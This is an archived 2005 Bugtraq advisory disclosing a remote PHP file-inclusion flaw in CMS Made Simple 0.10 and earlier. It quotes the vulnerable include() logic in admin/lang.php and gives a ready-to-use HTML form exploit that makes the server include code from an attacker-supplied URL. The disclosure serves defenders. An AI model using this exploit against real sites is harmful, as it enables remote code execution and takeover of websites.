CMS Made Simple <= 0.10 - PHP injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CMS Made Simple <= 0.10 - PHP injection
From: groszynskif@xxxxxxxxx
Date: 31 Aug 2005 19:18:04 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection 
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

        CMS Made Simple is an easy to use content managment
   system for simple stable content site. Uses PHP, MySQL
   and Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exist in ./admin/lang.php:

   <?php
        ...
        $current_language = "en_US";
        #Only do language stuff for admin pages
[!]     if (isset($CMS_ADMIN_PAGE)) {
                ...
                #Check to see if there is already a language in use...
                if (isset($_POST["change_cms_lang"])) {
[!]                     $current_language = $_POST["change_cms_lang"];
                        setcookie("cms_language", $_POST["change_cms_lang"]);
                } else if (isset($_COOKIE["cms_language"])) {
                        $current_language = $_COOKIE["cms_language"];
                }
                else {
                        ...
                }

                #Ok, we have a language to load, let's load it already...
                if (isset($nls['file'][$current_language])) {
                        foreach ($nls['file'][$current_language] as $onefile) {
[!]                             include($onefile);
                        }
                }
                ...
        }
        ...
   ?>
   --------------------------------------------------------

   Exploit:

        example.html:
          <form 
action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)"
 method=post>
          <input type=hidden name=change_cms_lang value=vx>
          <input type=submit name=test VALUE="do it">
          </form>
        EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

Follow-Ups:
- Re: CMS Made Simple <= 0.10 - PHP injection
  - From: garaged

Prev by Date: RE: secure client-side platform
Next by Date: Vulnerability in Symantec Anti Virus Corporate Edition v9.x
Previous by thread: Flatnuke 2.5.6 (possibly prior versions) Underlying system information disclosure / Administrative & users credentials disclosure
Next by thread: Re: CMS Made Simple <= 0.10 - PHP injection
Index(es):
- Date
- Thread